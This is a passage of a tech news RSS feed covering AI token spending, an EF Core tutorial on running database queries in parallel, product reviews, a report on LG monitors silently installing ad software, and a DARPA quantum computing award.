<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Steve Wozniak gave Apple its soul before Steve Jobs made it a hit]]></title>
<description><![CDATA[It's been over four decades since Steve Wozniak left Apple, but as co-founder and creator of the firm's first computers, Woz still fully enjoys his place in history.Steve Wozniak in 2026 - Image Credit: CBS Sunday MorningYou're an AppleInsider reader so you know Apple and inescapably, you know th...]]></description>
<link>https://tsecurity.de/de/3691389/ios-mac-os/steve-wozniak-gave-apple-its-soul-before-steve-jobs-made-it-a-hit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691389/ios-mac-os/steve-wozniak-gave-apple-its-soul-before-steve-jobs-made-it-a-hit/</guid>
<pubDate>Fri, 24 Jul 2026 13:29:45 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's been over four decades since Steve Wozniak left Apple, but as co-founder and creator of the firm's first computers, Woz still fully enjoys his place in history.<br><br><div><img src="https://photos5.appleinsider.com/gallery/66972-140659-wozcbssunday-xl.jpg" alt="Older man with gray hair, full white beard, and round glasses speaking outdoors, wearing a dark jacket, with blurred trees and a house in the background"><br><span>Steve Wozniak in 2026 - Image Credit: CBS Sunday Morning</span></div><br>You're an <em>AppleInsider</em> reader so you know Apple and inescapably, you know the story. Steve Wozniak was the brilliant engineer, <a href="https://appleinsider.com/inside/steve-jobs" title="Steve Jobs" data-kpt="1">Steve Jobs</a> was the brilliant businessman, and Ronald Wayne was, er, something else.<br><br>These are the three who founded Apple in 1976, but the story of both Woz and Jobs goes back further, and really also goes deeper. Woz truly was a remarkable engineer but if he had been able to have his way, he'd have been happy giving away everything he made.<br><br><br> <a href="https://appleinsider.com/articles/26/07/24/steve-wozniak-gave-apple-its-soul-before-steve-jobs-made-it-a-hit?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245048?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Christopher Nolan’s ‘Odyssey’ Shows That Epics Are Better Without A.I. ]]></title>
<description><![CDATA[A.I. has rendered eye candy cheap. Viewers long for the visceral.]]></description>
<link>https://tsecurity.de/de/3691116/ai-nachrichten/christopher-nolans-odyssey-shows-that-epics-are-better-without-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691116/ai-nachrichten/christopher-nolans-odyssey-shows-that-epics-are-better-without-ai/</guid>
<pubDate>Fri, 24 Jul 2026 11:27:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A.I. has rendered eye candy cheap. Viewers long for the visceral.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to execute queries in parallel using EF Core]]></title>
<description><![CDATA[EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The DbContext class is the core component of the EF Core framework for managing database operations. However, the DbContext class in EF Core is not thr...]]></description>
<link>https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691080/ai-nachrichten/how-to-execute-queries-in-parallel-using-ef-core/</guid>
<pubDate>Fri, 24 Jul 2026 11:04:59 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">EF Core is Microsoft’s flagship ORM (object-relational mapper), the software layer that allows .NET developers to work with relational databases. The <code>DbContext</code> class is the core component of the EF Core framework for managing database operations. However, the <code>DbContext</code> class in EF Core is not thread-safe. Hence, if you share <code>DbContext</code> instances between multiple threads, you will often encounter data corruption issues and the <code>InvalidOperationException</code>.</p>



<p class="wp-block-paragraph">In this article, we’ll learn how we can execute queries in parallel in EF Core by handling thread-safety issues to avoid concurrency errors. To work with the code examples provided in this article, you should have Visual Studio 2026 installed in your system. You can <a href="https://visualstudio.microsoft.com/insiders/">download Visual Studio 2026 here</a>.</p>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the problem</h2>



<p class="wp-block-paragraph">When working in today’s data-driven applications, you will often need to fetch data from multiple unrelated datasets. In applications that use concurrency, thread-safety is critical to guaranteeing correct execution, avoiding data corruption and race conditions, and ensuring data consistency. Let’s understand this with an example. </p>



<p class="wp-block-paragraph">Let’s say we want to populate a dashboard that displays all recently processed orders, metrics, logs, and traces, as well as your application’s performance metadata. We might write the following code. </p>



<pre class="wp-block-code"><code>public class Dashboard
{
    public List Orders { get; set; } = new();
    public Metrics Metrics { get; set; } = new();
    public List Logs { get; set; } = new();
    public List Traces { get; set; } = new();
}
public static async Task LoadDashboardAsync(ProductService productService)
{
    Task&lt;List&gt;    ordersTask  = productService.GetProcessedOrdersAsync();
    Task        metricsTask = productService.GetMetricsAsync();
    Task&lt;List&gt; logsTask    = productService.GetRecentLogsAsync();
    Task&lt;List&gt;    tracesTask  = productService.GetTracesAsync();
    await Task.WhenAll(ordersTask, metricsTask, logsTask, tracesTask);
    return new Dashboard
    {
        Orders  = await ordersTask,
        Metrics = await metricsTask,
        Logs    = await logsTask,
        Traces  = await tracesTask
    };
}
</code></pre>



<p class="wp-block-paragraph">In the preceding code snippet, there are four read operations that are executed by four different <code>Task</code> instances. Our objective is to ensure that the database round trips run in parallel instead of in sequence. We can accomplish this by using<code>Task.WhenAll</code>, which starts the four tasks, waits for every task to finish, then returns the data wrapped inside a new <code>Dashboard</code> instance.</p>



<p class="wp-block-paragraph">If we executed these queries sequentially, the user would have to wait until each query completed its execution in turn—for a total wait time equal to the sum of the times for all four queries. However, by running these queries in parallel, we reduce the wait time considerably. The user will need to wait only as long as it takes for the slowest of the four queries to complete its execution.</p>



<p class="wp-block-paragraph">However, there is a danger with the above approach. If you run multiple operations on the same <code>DbContext</code> instance, you will see an <code>InvalidOperationException</code> with the following message:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">A second operation started in this context before the previous operation was completed. This is usually caused by multiple threads using the same <code>DbContext</code> instance; instance members are not guaranteed to be thread-safe.</p>
</blockquote>



<p class="wp-block-paragraph">Databases such as SQL Server, PostgreSQL, and Oracle Database follow a request-response communication model at the connection level: a single connection can process only one command at a time. Hence, you cannot run multiple queries concurrently using the connection. If you <code>await</code> several operations using the same connection, EF Core detects the overlapping use of a non-thread-safe context and throws an <code>InvalidOperationException</code>. To run queries in parallel, you must give each task its own connection or context.</p>



<h2 class="wp-block-heading">Why DbContext isn’t thread-safe – and how to work around it</h2>



<p class="wp-block-paragraph">The <code>DbContext</code> class in EF Core is designed to manage a single unit of work. To be more precise, EF Core does not provide support for running multiple operations on the same <code>DbContext</code> instance. This design approach creates inherent challenges when you use the same <code>DbContext</code> instance across multiple threads. If <code>DbContext</code> were thread-safe, extensive locking would be required, which would degrade data access performance.</p>



<p class="wp-block-paragraph">This stateful design of <code>DbContext</code> makes it unsuitable for concurrent access patterns that involve loading, modifying, or tracking different sets of data simultaneously, because it needs to maintain the internal representation of database state.</p>



<p class="wp-block-paragraph">The <a href="https://learn.microsoft.com/en-us/ef/core/change-tracking/" data-type="link" data-id="https://learn.microsoft.com/en-us/ef/core/change-tracking/">change tracker</a> is one of the most important components of <code>DbContext</code> in EF Core. It monitors all entities loaded into memory and detects any changes made to them after they have been loaded. It keeps track of the original, current, and changed values of the entities, thereby enabling the EF Core runtime to know the current state of these entities when you call the <code>SaveChanges()</code> method on the <code>DbContext</code> instance.</p>



<p class="wp-block-paragraph">To implement thread-safety when working with DbContext, we must write our code to ensure that each concurrent operation gets its own copy of a short-lived instance. Now, we <em>could</em> accomplish this by wrapping a shared <code>DbContext</code> instance inside a thread-safe block using the <code>lock</code> keyword, so that all calls to the database take place using one and only one thread at a time. This approach is illustrated in the code snippet below. </p>



<pre class="wp-block-code"><code>using Microsoft.EntityFrameworkCore;
public class Product
{
    public int Id { get; set; }
    public string Name { get; set; } = string.Empty;
    public decimal Price { get; set; }
    public int Quantity { get; set; }
}
public class AppDbContext : DbContext
{
    public AppDbContext(DbContextOptions options) : base(options) { }
    public DbSet Products =&gt; Set();
}
</code></pre>



<p class="wp-block-paragraph">However, while the above approach gives us the thread-safety we need, it can degrade data access performance considerably. A better approach is to use <code>IDbContextFactory</code> , which creates fresh <code>DbContext</code> instances on demand. Calling its <code>CreateDbContext()</code> method is cheap and produces a fresh, isolated context every time. </p>



<p class="wp-block-paragraph">The following code snippet shows how you can register an instance of type <code>IDbContextFactory</code> as a singleton. You can safely call this code from any thread.</p>



<pre class="wp-block-code"><code>builder.Services.AddDbContextFactory(options =&gt;
    options.UseSqlServer(
        builder.Configuration.GetConnectionString("Default")));
</code></pre>



<h2 class="wp-block-heading">Executing EF Core queries in parallel – the solution</h2>



<p class="wp-block-paragraph">Now let’s see how we can put <code>IDbContextFactory</code> to work. The following code illustrates a class named <code>ProductService</code> that uses a factory to create <code>DbContext</code> instances for each scope of work.</p>



<pre class="wp-block-code"><code>public class ProductService
{
    private readonly IDbContextFactory _factory;
    public ProductService(IDbContextFactory factory)
        =&gt; _factory = factory;
    public async Task GetByIdAsync(int id)
    {
        await using var context = await _factory.CreateDbContextAsync();
        return await context.Products.FindAsync(id);
    }
    public async Task UpdateStockQuantityAsync(int id, int updateQuantity)
    {
        await using var context = await _factory.CreateDbContextAsync();
        var product = await context.Products.FindAsync(id);
        if (product is null) return;
        product.Quantity += updateQuantity;
        await context.SaveChangesAsync();
    }
}
</code></pre>



<p class="wp-block-paragraph">Note that <code>ProductService</code> has two methods, <code>GetByIdAsync</code> and <code>UpdateStockQuantityAsync</code>. An instance of the <code>DbContext</code> class is created locally in each of these methods. Now, suppose you have two threads, T1 and T2, that execute these methods concurrently. That is, thread T1 executes the <code>GetByIdAsync</code> method while thread T2 executes the <code>UpdateStockQuantityAsync</code> method. Because each of these methods is executed in isolation, they will have their own context, connection, and change-tracking information, and there will be no mutable state, so you don’t need to implement thread synchronization in either of these methods.</p>



<p class="wp-block-paragraph">Consider the following code that executes a read operation and an update operation in two separate tasks. </p>



<pre class="wp-block-code"><code>public static async Task RunMethodsInParallelAsync(ProductService productService)
{
      Task readTask = productService.GetByIdAsync(1);
      Task updateTask = productService.UpdateStockQuantityAsync(3, 5);
      await Task.WhenAll(readTask, updateTask);
      Product? product = await readTask;
 }
</code></pre>



<p class="wp-block-paragraph">The <code>Task.WhenAll</code> method runs the two tasks in parallel and waits until both have finished. The reason this approach is thread-safe, and will not create concurrency errors, is that each of these two methods creates its own <code>DbContext</code> instance internally. Therefore the read operation and the update operation use independent <code>DbContext</code> instances.</p>



<h2 class="wp-block-heading">Use DbContext pooling to reduce allocation cost</h2>



<p class="wp-block-paragraph">Although creating <code>DbContext</code> instances is not that costly, you should consider using pooled contexts in applications that require high scalability and high performance. The following code snippet shows how you can register a pooled context. </p>



<pre class="wp-block-code"><code>builder.Services.AddPooledDbContextFactory(options =&gt;
    options.UseSqlServer(connectionString));
</code></pre>



<p class="wp-block-paragraph">A call to <code>AddDbContext()</code> will register a <code>DbContext</code> instance as scoped per HTTP request. Each request will run on a different thread and each will have its own context. However, keep in mind that the default scoped registration of the <code>DbContext</code> will not always suffice.</p>



<p class="wp-block-paragraph">You will need a factory to create instances of <code>DbContext</code> when you’re using a background service, or performing some work inside a particular request, or running some business logic operation over multiple contexts.</p>



<h2 class="wp-block-heading">Key takeaways</h2>



<ul class="wp-block-list">
<li>If you use EF Core in the data access layer of your application, you must implement thread safety measures whenever you run your queries in parallel.</li>



<li>You cannot execute multiple queries in parallel in EF Core using the same <code>DbContext</code> instance.</li>



<li>The <code>IDbContextFactory</code> enables you to create a <code>DbContext</code> instance for each thread, thereby enabling you to work with these instances in isolation.</li>



<li>Although using a <code>DbContext</code> pool involves a small allocation overhead, it becomes a non-issue if you need high throughput.</li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Keychron Q6 HE 8K Review: A great mechanical keyboard for work and play]]></title>
<description><![CDATA[The Keychron Q6 HE 8K is a solid mechanical keyboard with magnetic switches. While it's not cheap, it's got more than enough to give a great typing experience on Mac.Keychron Q6 HE 8KWhen it comes to mechanical keyboards, Keychron stands out as one of the industry leaders. All thanks to its vast ...]]></description>
<link>https://tsecurity.de/de/3690478/ios-mac-os/keychron-q6-he-8k-review-a-great-mechanical-keyboard-for-work-and-play/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690478/ios-mac-os/keychron-q6-he-8k-review-a-great-mechanical-keyboard-for-work-and-play/</guid>
<pubDate>Fri, 24 Jul 2026 02:10:25 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Keychron Q6 HE 8K is a solid mechanical keyboard with magnetic switches. While it's not cheap, it's got more than enough to give a great typing experience on <a href="https://appleinsider.com/inside/mac" title="Mac" data-kpt="1">Mac</a>.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68283-143936-KeychronQ6HE8KReview5-xl.jpg" alt="White mechanical keyboard on wooden desk, featuring pastel gray and blue keycaps, subtle green backlighting under keys, full number pad, and connected white cable at the top left" height="738"><br><span>Keychron Q6 HE 8K</span></div><br>When it comes to mechanical keyboards, Keychron stands out as one of the industry leaders. All thanks to its vast array of styles, colors, and features aimed at both Windows and <a href="https://appleinsider.com/inside/macos" title="macOS" data-kpt="1">macOS</a> users.<br><br>The <a href="https://www.amazon.com/Swappable-Backlight-Magnetic-Switch-Version/dp/B0F9KYS9TS?th=1&amp;tag=apinsiderreview-20" rel="nofollow">Keychron Q6 HE 8K</a> is a beefy new release, and I put it through an extended test drive in my ongoing series of reviews of Keychron products. It's an ever-continuing search for the mechanical keyboard that will earn a permanent position on my workspace.<br><br><br> <a href="https://appleinsider.com/articles/26/07/23/keychron-q6-he-8k-review-a-great-mechanical-keyboard-for-work-and-play?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/245044?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft Responds to LG Monitors Installing McAfee Ads On Windows]]></title>
<description><![CDATA[LG is removing a McAfee pop-up ad from its LG Monitor App Installer after criticism that some LG monitors were silently installing the app through Windows Update and showing ads on every boot. Microsoft says LG agreed to disable the McAfee pop-up, but the broader issue remains: Windows allows cer...]]></description>
<link>https://tsecurity.de/de/3690305/it-security-nachrichten/microsoft-responds-to-lg-monitors-installing-mcafee-ads-on-windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690305/it-security-nachrichten/microsoft-responds-to-lg-monitors-installing-mcafee-ads-on-windows/</guid>
<pubDate>Fri, 24 Jul 2026 00:09:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LG is removing a McAfee pop-up ad from its LG Monitor App Installer after criticism that some LG monitors were silently installing the app through Windows Update and showing ads on every boot. Microsoft says LG agreed to disable the McAfee pop-up, but the broader issue remains: Windows allows certain peripheral companion apps to install automatically without notifying users. Ars Technica reports: Following Gamers Nexus' video, a Microsoft representative stated that the LG Monitor App Installer will no longer show pop-up ads for McAfee. In response to a social media post about the app, Pavan Davuluri, EVP of Windows and devices at Microsoft, said this week: "We've connected with the team at LG and as an immediate next step, they have agreed to disable the McAfee pop-up from their app. We appreciate LG working with us toward a shared goal of a better experience for our mutual customers. We will keep improving here with our ecosystem partners."
 
As mentioned, some LG monitors appear to have been installing LG Monitor App Installer onto Windows computers for months. Publication Windows Latest noted that the app recently got an update, "and its changelog mentions McAfee as an additional app," which could be what prompted more people to see the ads... and then complain about them. However, the removal of McAfee doesn't address the problem of a peripheral installing ad-pushing software onto people's computers.
 
Users have been finding LG Monitor App Installer and its ads on their systems without LG ever showing a prompt or asking for permission. LG has some of the most expensive computer monitors available. Paying, in some cases, over $1,000 for a monitor that ends up forcing ads onto Windows is disruptive and a privacy concern. Once the app is installed, "LG technically possesses permission to use 'all system resources,'" as well as to "collect geolocation, device data, online activity, contacts, user credentials, transactions, and more," [editor-in-chief of Gamers Nexus, Steve Burke] said.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Microsoft+Responds+to+LG+Monitors+Installing+McAfee+Ads+On+Windows%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F2137202%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F2137202%2Fmicrosoft-responds-to-lg-monitors-installing-mcafee-ads-on-windows%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/23/2137202/microsoft-responds-to-lg-monitors-installing-mcafee-ads-on-windows?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[the PERFECT Raspberry Pi wall dashboard?]]></title>
<description><![CDATA[Author: NetworkChuck - Bewertung: 319x - Views:3894 This video is sponsored by NetworkChuck Coffee. Grab a bag of Default Route (my favorite) and fuel your next build: https://ntck.co/coffee

Raspberry Pi sent me the new Raspberry Pi Touch Display 2, the 10 inch portrait version, and I mounted it...]]></description>
<link>https://tsecurity.de/de/3690019/it-security-video/the-perfect-raspberry-pi-wall-dashboard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690019/it-security-video/the-perfect-raspberry-pi-wall-dashboard/</guid>
<pubDate>Thu, 23 Jul 2026 20:49:01 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NetworkChuck - Bewertung: 319x - Views:3894 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/34D1imLordU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>This video is sponsored by NetworkChuck Coffee. Grab a bag of Default Route (my favorite) and fuel your next build: https://ntck.co/coffee<br />
<br />
Raspberry Pi sent me the new Raspberry Pi Touch Display 2, the 10 inch portrait version, and I mounted it on my studio wall to run all my Home Assistant and homelab stuff. It is a gorgeous little screen (1200x1920, real IPS, 10 finger touch, 400 nits) and at $80 it is a steal. There is one catch though, and a lot of you are not going to like it: this thing only works on the Raspberry Pi 5 and the Compute Modules. Your Pi 3 or Pi 4 will not work at all.<br />
<br />
In this video I unbox it, walk through everything that is new versus the old touch display, hit a wall when it powered on and did absolutely nothing (turns out you have to update the firmware on your Pi 5, the EEPROM, before it will recognize the screen), mount it with nothing but a drill and some screws, and finally turn it into a beautiful Home Assistant dashboard using an open source kiosk app called TouchKio. Whether you are building a smart home wall panel, a homelab status board, or you just want your Raspberry Pi to show off what it is doing, this is a really good option.<br />
<br />
Join the NetworkChuck Academy!: https://ntck.co/NCAcademy<br />
<br />
RESOURCES / LINKS:<br />
🌐 Raspberry Pi Touch Display 2: https://www.raspberrypi.com/products/touch-display-2/<br />
🛠️ TouchKio (open source kiosk app): https://github.com/leukipp/touchkio<br />
🏠 Home Assistant: https://www.home-assistant.io/<br />
🖥️ Proxmox: https://www.proxmox.com/<br />
📖 Update your Raspberry Pi firmware (EEPROM): https://www.raspberrypi.com/documentation/computers/raspberry-pi.html<br />
☕ NetworkChuck Coffee (Default Route): https://ntck.co/coffee<br />
<br />
TIMESTAMPS:<br />
0:00 - Unboxing the new Raspberry Pi Touch Display 2<br />
0:45 - What is new on the 10 inch portrait display<br />
1:50 - The catch: Raspberry Pi 5 and Compute Modules only<br />
2:48 - It powered on and nothing happened<br />
3:16 - The fix: updating your Raspberry Pi 5 firmware<br />
5:55 - Building the Home Assistant dashboard with TouchKio<br />
<br />
**Raspberry Pi provided the Touch Display 2 for this video, no strings attached. All opinions are my own.<br />
<br />
SUPPORT NETWORKCHUCK:<br />
☕☕ COFFEE and MERCH: https://ntck.co/coffee<br />
<br />
READY TO LEARN??<br />
🔥🔥Join the NetworkChuck Academy!: https://ntck.co/NCAcademy<br />
📚 CCNA Course: https://ntck.co/ccna<br />
<br />
FOLLOW ME EVERYWHERE:<br />
Instagram: https://www.instagram.com/networkchuck/<br />
X/Twitter: https://x.com/networkchuck<br />
Facebook: https://www.facebook.com/NetworkChuck/<br />
Join the Discord server: https://ntck.co/discord<br />
<br />
Some links in this description are affiliate links. If you buy through them, I may earn a small commission at no extra cost to you.<br />
<br />
#raspberrypi #homeassistant #homelab<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Now Supports Netflix Streaming in 4K on Windows 11]]></title>
<description><![CDATA[Google Chrome has started supporting Netflix playback in 4K Ultra HD on compatible Windows 11 computers, giving users another way to stream at the platform’s highest resolution.




https://twitter.com/saurax04/status/2080317848677957869




Netflix previously limited Chrome playback on Windows t...]]></description>
<link>https://tsecurity.de/de/3689628/ios-mac-os/chrome-now-supports-netflix-streaming-in-4k-on-windows-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689628/ios-mac-os/chrome-now-supports-netflix-streaming-in-4k-on-windows-11/</guid>
<pubDate>Thu, 23 Jul 2026 18:03:34 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google Chrome has started supporting Netflix playback in 4K Ultra HD on compatible Windows 11 computers, giving users another way to stream at the platform’s highest resolution.




https://twitter.com/saurax04/status/2080317848677957869




Netflix previously limited Chrome playback on Windows to lower resolutions, while users generally relied on Microsoft Edge or the Windows app for 4K streaming. Its updated system requirements now list Chrome 117 or later as supporting up to Ultra HD 2160p on Windows.



However, installing the latest Chrome version does not guarantee 4K playback. Users need Windows 11 with current updates, a Netflix plan that includes Ultra HD and a steady internet connection of at least 15 Mbps.



The computer must also have compatible graphics hardware, such as an Nvidia GeForce GTX 1050 or newer, an AMD Radeon RX 400 series or newer, or a supported Intel or AMD processor. Some systems also require the HEVC video extension.



Display requirements still apply



Netflix requires a 4K display running at 60Hz. External screens must use an HDCP 2.2-compatible connection, and every active connected display must meet the same requirements.



Users should also set Netflix playback quality to Auto or High and choose a title carrying the 4K label. Chrome on macOS remains limited to 1080p, while Safari supports 4K on compatible Macs.]]></content:encoded>
</item>
<item>
<title><![CDATA[Federal quantum bet grows with DARPA’s $125 million PsiQuantum award]]></title>
<description><![CDATA[Defense research agency DARPA made its largest quantum computing award ever this week, with a $125 million agreement announced on Wednesday. The same day, the White House announced an additional $5 billion for the Genesis Mission, which focuses on AI for science but also includes technology to ac...]]></description>
<link>https://tsecurity.de/de/3689459/it-security-nachrichten/federal-quantum-bet-grows-with-darpas-125-million-psiquantum-award/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689459/it-security-nachrichten/federal-quantum-bet-grows-with-darpas-125-million-psiquantum-award/</guid>
<pubDate>Thu, 23 Jul 2026 17:13:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Defense research agency DARPA made its largest quantum computing award ever this week, with a <a href="https://www.psiquantum.com/news-import/psiquantum-signs-125-million-agreement-with-darpa">$125 million agreement</a> announced on Wednesday. The same day, the White House announced an <a href="https://www.whitehouse.gov/releases/2026/07/45502/">additional $5 billion for the Genesis Mission</a>, which focuses on AI for science but also includes technology to accelerate quantum computing and quantum sensors.</p>



<p class="wp-block-paragraph">“Taken together, these announcements signal that U.S. quantum strategy is shifting from supporting individual research projects to building the infrastructure needed for a quantum-enabled economy,” says <a href="https://www.linkedin.com/in/heather-c-west-ph-d-52075667/">Heather West</a>, research manager in the infrastructure systems, platforms, and technology group at IDC.</p>



<p class="wp-block-paragraph">None of the individual quantum announcements are surprising, she says. But the level of coordination is new. “Government investment is expanding beyond foundational research toward commercialization, manufacturing, and deployment,” she says.</p>



<p class="wp-block-paragraph">“The US government has been signaling that quantum computing is a priority,” says <a href="https://www.linkedin.com/in/davidmooter/">David Mooter</a>, an analyst at Forrester Research. Part of it is the desire for the US to be a leader in quantum, as it has been in other high-tech areas, he says. And part of it is because the government itself can take advantage of quantum computers.</p>



<p class="wp-block-paragraph">“Spy agencies would love to use them to decrypt intercepted messages, including messages they intercepted years ago and saved,” he says. And other departments could use quantum computers or networks for energy-related research, for supply chain optimization, and for secure communications. </p>



<p class="wp-block-paragraph">Quantum computing is accelerating, he says. “I would not be surprised to see a general gate-based quantum computer that’s good enough to provide commercial value for limited use cases by 2030.”</p>



<h2 class="wp-block-heading">DARPA’s Quantum Benchmarking Initiative</h2>



<p class="wp-block-paragraph">DARPA’s Quantum Benchmarking Initiatives was launched in 2024, and 18 companies were selected in April of 2025 for <a href="https://www.darpa.mil/news/2025/companies-targeting-quantum-computers">Stage A of the project</a>, with awards of up to $1 million each. The companies were to use the money to provide details of their concepts and show how they could lead to a functional, fault-tolerant quantum computer in under a decade.</p>



<p class="wp-block-paragraph">Then, in November of 2025, DARPA chose 11 companies for <a href="https://www.darpa.mil/research/programs/quantum-benchmarking-initiative/stage-b-selection">Stage B of the project</a>, with awards of up to $15 million for developing their research plans.</p>



<p class="wp-block-paragraph">To date, only two companies have been chosen for <a href="https://www.darpa.mil/news/2025/quantum-computing-approaches">Stage C</a>: PsiQuantum and Microsoft. PsiQuantum announced $32 million of DARPA funding for testing and evaluation in September of last year. This week’s $125 million award will expand the scope and pacing of the validation and verification work. Stage C awards can go up to $300 million, <a href="https://www.darpa.mil/sites/default/files/attachment/2025-09/darpa-mto-spark-tank-qbi.pdf">according to DARPA</a>.</p>



